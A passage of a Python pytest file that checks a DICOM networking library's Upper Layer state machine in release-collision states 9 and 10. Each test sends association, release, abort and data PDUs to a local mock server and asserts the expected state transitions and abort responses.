self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt4", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt4",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_associate_rq), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt6",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt07(self):
"""Test Sta9 + Evt7."""
# Sta9 + Evt7 -> <ignore> -> Sta9
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt7",
]
def test_evt08(self):
"""Test Sta9 + Evt8."""
# Sta9 + Evt8 -> <ignore> -> Sta9
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt8",
]
def test_evt09(self):
"""Test Sta9 + Evt9."""
# Sta9 + Evt9 -> <ignore> -> Sta9
# Evt9: Receive P-DATA primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt9",
]
def test_evt10(self):
"""Test Sta9 + Evt10."""
# Sta9 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", p_data_tf), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt10", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt10",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt11(self):
"""Test Sta9 + Evt11."""
# Sta9 + Evt11 -> <ignore> -> Sta9
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt11",
]
def test_evt12(self):
"""Test Sta9 + Evt12."""
# Sta9 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rq), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt12", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt12",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt13(self):
"""Test Sta9 + Evt13."""
# Sta9 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt13", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt13",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt14(self):
"""Test Sta9 + Evt14."""
# Sta9 + Evt14 -> AR-9 -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-9: Send A-RELEASE-RP PDU to <remote>
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq),
("recv", None), # recv a-release-rp
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
]
assert scp.handlers[0].received[2] == (
b"\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt15(self):
"""Test Sta9 + Evt15."""
# Sta9 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt15", "AA-1"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt15",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt16(self):
"""Test Sta9 + Evt16."""
# Sta9 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_abort), # trigger event
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt16", "AA-3"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt16",
]
def test_evt17(self):
"""Test Sta9 + Evt17."""
# Sta9 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt17", "AA-4"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt17",
]
def test_evt18(self):
"""Test Sta9 + Evt18."""
# Sta9 + Evt18 -> <ignore> -> Sta9
# Evt18: ARTIM timer expired from <local service>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert self.fsm._transitions[:4] == ["Sta4", "Sta5", "Sta6", "Sta7"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt18",
]
def test_evt19(self):
"""Test Sta9 + Evt19."""
# Sta9 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", b"\x08\x00\x00\x00\x00\x00"), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt19", "AA-8"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:6] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt19",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState10(TestStateBase):
"""Tests for State 10: Release collision acc - awaiting A-RELEASE-RP ."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta10")
def test_evt01(self):
"""Test Sta10 + Evt1."""
# Sta10 + Evt1 -> <ignore> -> Sta10
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-ac
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta10 + Evt2."""
# Sta10 + Evt2 -> <ignore> -> Sta10
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta10 + Evt3."""
# Sta10 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_associate_ac), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt3", "AA-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt3"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt04(self):
"""Test Sta10 + Evt4."""
# Sta10 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_associate_rj), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt4", "AA-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt4"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta10 + Evt5."""
# Sta10 + Evt5 -> <ignore> -> Sta10
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta10 + Evt6."""
# Sta10 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_associate_rq), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt6", "AA-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt6"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt07(self):
"""Test Sta10 + Evt7."""
# Sta10 + Evt7 -> <ignore> -> Sta10
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt7"]
def test_evt08(self):
"""Test Sta10 + Evt8."""
# Sta10 + Evt8 -> <ignore> -> Sta10
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt8"]
def test_evt09(self):
"""Test Sta10 + Evt9."""
# Sta10 + Evt9 -> <ignore> -> Sta10
# Evt9: Receive P-DATA primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt9"]
def test_evt10(self):
"""Test Sta10 + Evt10."""
# Sta10 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", p_data_tf), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt10", "AA-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt10"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt11(self):
"""Test Sta10 + Evt11."""
# Sta10 + Evt11 -> <ignore> -> Sta10
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt11"]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rq), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt12", "AA-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt12"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
# Sta10 + Evt13 -> AR-10 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp), # trigger event
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt13"]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt14"]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt15", "AA-1"),
]
